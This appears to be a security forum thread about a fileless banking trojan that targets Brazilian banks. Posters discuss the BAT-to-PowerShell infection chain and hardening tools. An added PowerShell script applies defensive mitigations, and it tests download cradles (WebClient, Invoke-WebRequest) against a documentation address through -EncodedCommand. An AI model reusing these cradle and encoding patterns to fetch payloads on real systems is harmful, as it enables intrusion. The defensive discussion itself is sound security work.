Fileless Banking Trojan Targeting Brazilian Banks

LASER_oneXM

We analyzed a fileless malware with multiple .BAT attachments and a batch file from IoCs reported by researchers online that was capable of opening an IP address, downloading a PowerShell with a banking trojan payload, and installing a hack tool and an information stealer. Looking further, we observed it stealing machine information and user credentials, scanning for strings related to three specific Brazilian banks (Banco Bradesco, Banco do Brasil, and Sicredi) and other possible network connections via saved Outlook contacts, and installing the hack tool RADMIN. Our telemetry showed the highest infection attempts in Brazil and Taiwan.

Aside from accessing users’ banking accounts, the stolen PII gathered from the visited websites and recorded machine credentials can be further abused or sold. Also, considering the wide financial services and customer bases of these three targeted banks, we are following this developing threat as it can be used for bigger botnet or mass-mailed targeted attacks.
 

Andy Ful

Maybe in Brazil, people do not use hardening tools?

Simple infection chain:

email attachment (BAT file) --> Command shell (cmd.exe) ---> PowerShell commands ---> download the payloads ---> etc.

There are known free tools that prevent running BAT files (SysHardener, HardenTools, H_C). Furthermore, the PowerShell download command from this payload will fail when PowerShell is set to Constrained Language mode (SysHardener tweaked, H_C), or PowerShell is blocked from running with cmd.exe (H_C enhanced profile), or PowerShell outbound connections are blocked by Windows Firewall (SysHardener).
 
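As an added example, not code from the thread and not taken from Hard_Configurator, SysHardener or HardenTools: manual PowerShell equivalents of the three mitigations listed in the post above (Constrained Language mode, a firewall block on the PowerShell hosts, and keeping double-clicked BAT files out of cmd.exe), plus a probe that shows which download cradles each one actually stops and a check for PowerShell started by cmd.exe. The function names and firewall rule names are my own, and 192.0.2.10 is an RFC 5737 documentation address, so nothing is really downloaded.

```powershell
# Added example, not from the thread or from Hard_Configurator, SysHardener or
# HardenTools. Manual equivalents of the three mitigations in the post above, plus
# a probe that shows which step of "BAT -> cmd.exe -> PowerShell -> download"
# each one breaks. Windows PowerShell 5.1, run elevated. Function and rule names
# are mine; 192.0.2.10 is an RFC 5737 documentation address, so nothing is fetched.

# --- 1. Constrained Language mode (CLM) ------------------------------------------
# __PSLockdownPolicy=4 starts every new powershell.exe in ConstrainedLanguage. It is
# only an environment variable: anything running as admin can clear it. WDAC or
# AppLocker enforce CLM properly; this is the quick lab-box version.
function Enable-ConstrainedLanguage {
    [Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')  # future logons
    $env:__PSLockdownPolicy = '4'                                                # children of this session
}

# Run a child PowerShell (it inherits the variable) and try two cradle styles.
# New-Object Net.WebClient is refused because WebClient is not a CLM core type.
# Invoke-WebRequest is a cmdlet and is NOT stopped by CLM; only the firewall rule
# below (or the unreachable address) makes it fail.
function Test-DownloadCradles {
    $probe = @'
"LanguageMode: $($ExecutionContext.SessionState.LanguageMode)"
try   { New-Object Net.WebClient | Out-Null; "New-Object Net.WebClient : ALLOWED" }
catch { "New-Object Net.WebClient : blocked by CLM" }
try   { Invoke-WebRequest -Uri 'http://192.0.2.10/payload.ps1' -TimeoutSec 3 | Out-Null
        "Invoke-WebRequest        : ALLOWED and succeeded" }
catch { "Invoke-WebRequest        : not blocked by CLM, failed at network layer: $($_.Exception.Message)" }
'@
    # -EncodedCommand avoids quoting problems (it is also the switch BAT droppers favour).
    $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($probe))
    powershell.exe -NoProfile -NonInteractive -EncodedCommand $encoded
}

# --- 2. Windows Firewall: no outbound traffic for the PowerShell hosts -----------
# Stops every cradle, cmdlet-based ones included, but also any legitimate script
# that needs the network (Install-Module, WinRM clients), so scope it deliberately.
function Block-PowerShellOutbound {
    $psHosts = @(
        "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe",
        "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",      # 32-bit host, easy to forget
        "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell_ise.exe"
    ) | Where-Object { Test-Path $_ }
    foreach ($exe in $psHosts) {
        $name = "Block outbound - $exe"
        if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
            New-NetFirewallRule -DisplayName $name -Direction Outbound -Program $exe `
                                -Action Block -Profile Any -Enabled True | Out-Null
        }
    }
}

# --- 3. Keep double-clicked .bat/.cmd attachments away from cmd.exe --------------
# ShellExecute resolves the batfile/cmdfile ProgIds; pointing them at Notepad makes
# an attachment open as text. This does nothing for 'cmd.exe /c x.bat' launched by
# another process; that needs an SRP/AppLocker path rule.
function Disable-BatDoubleClick {
    foreach ($progId in 'batfile', 'cmdfile') {
        Set-ItemProperty -Path "HKLM:\SOFTWARE\Classes\$progId\shell\open\command" `
                         -Name '(default)' -Type ExpandString `
                         -Value '"%SystemRoot%\System32\notepad.exe" "%1"'
    }
}

# --- 4. Visibility: which PowerShell processes were started by cmd.exe? ----------
# Needs 'Audit Process Creation' plus 'Include command line in process creation
# events'; otherwise there are no 4688 events, or they carry no command line.
function Get-CmdSpawnedPowerShell {
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 5000 -ErrorAction SilentlyContinue |
        ForEach-Object {
            $evt = $_
            $d = @{}
            ([xml]$evt.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
            if ($d.NewProcessName -match 'powershell(_ise)?\.exe$' -and $d.ParentProcessName -match '\\cmd\.exe$') {
                [pscustomobject]@{ Time = $evt.TimeCreated; Parent = $d.ParentProcessName; CommandLine = $d.CommandLine }
            }
        }
}

Enable-ConstrainedLanguage
Test-DownloadCradles
Block-PowerShellOutbound
Disable-BatDoubleClick
Get-CmdSpawnedPowerShell | Format-Table -AutoSize
```

The probe is the useful part: after step 1 the child session reports ConstrainedLanguage and refuses New-Object Net.WebClient, which is the cradle most BAT droppers carry, but Invoke-WebRequest still runs, because CLM restricts .NET types and method calls, not cmdlets. That is why the firewall rule is listed as a separate mitigation: it is the only one of the three that stops a cmdlet-based download, at the price of breaking every legitimate PowerShell script that needs the network.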

shmu26

Andy Ful said:
Maybe in Brazil, people do not use hardening tools?

Simple infection chain:
email attachment (BAT file) --> Command shell (cmd.exe) ---> PowerShell commands ---> download the payloads ---> etc.

There are known free tools that prevent running BAT files (SysHardener, HardenTools, H_C). Furthermore, the PowerShell download command from this payload will fail when PowerShell is set to Constrained Language mode (SysHardener tweaked, H_C), or PowerShell is blocked from running with cmd.exe (H_C enhanced profile), or PowerShell outbound connections are blocked by Windows Firewall (SysHardener).

Also, Comodo at CS settings should stop those BAT files. And I think OSA has a specific rule for blocking PowerShell commands that are passed by cmd.exe.
 

Nightwalker

How come banking trojans are always attacking Brazil? This sounds sooooo familiar.

Brazilian hacker groups are very active and clever; they are very similar to how Russian groups act, so it isn't strange to see many novel techniques implemented in banking trojans.

Financial malware is more than twice as prevalent as ransomware, and there is a reason for that (easy "revenue")...
 

Andy Ful

shmu26 said:
Also, Comodo at CS settings should stop those BAT files. And I think OSA has a specific rule for blocking PowerShell commands that are passed by cmd.exe.

Comodo will not block the BAT file. Comodo and some good AVs can be tweaked to stop this malware when it tries to use PowerShell. For example, Kaspersky Application Control can be used to restrict PowerShell. There are some more programs based on their own drivers which can stop this malware (Excubits drivers, OSArmor, NVT ERP, VoodooShield, tweaked Sandboxie, tweaked ReHIPS, etc.).
 